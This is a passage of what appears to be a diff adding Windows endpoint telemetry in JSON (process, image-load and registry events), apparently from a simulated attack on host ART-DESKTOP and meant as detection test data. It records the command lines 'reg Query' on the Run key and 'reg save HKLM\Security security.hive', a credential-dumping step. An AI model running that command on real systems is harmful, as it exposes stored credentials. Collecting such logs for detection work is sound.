"process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "command_line": "reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 888, + "ppid": 4548, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571316110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": 
"C:\\Windows\\System32\\rpcrt4.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "process", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "process", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\Security security.hive\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 132, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571316290000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + 
}, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "command_line": "reg save HKLM\\Security security.hive", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6700, + "ppid": 132, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571316430000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6700, + "process_name": "reg.exe", + 
"process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883571421830000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883571447460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": 
"Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883571447460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571449020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571449020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571449020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + 
"process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883571467310016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA314B055", + "registry_value": "41C64E6DA314B055", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", + "registry_value": "{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + 
"process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": 
"sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + 
"registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + 
"unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": 
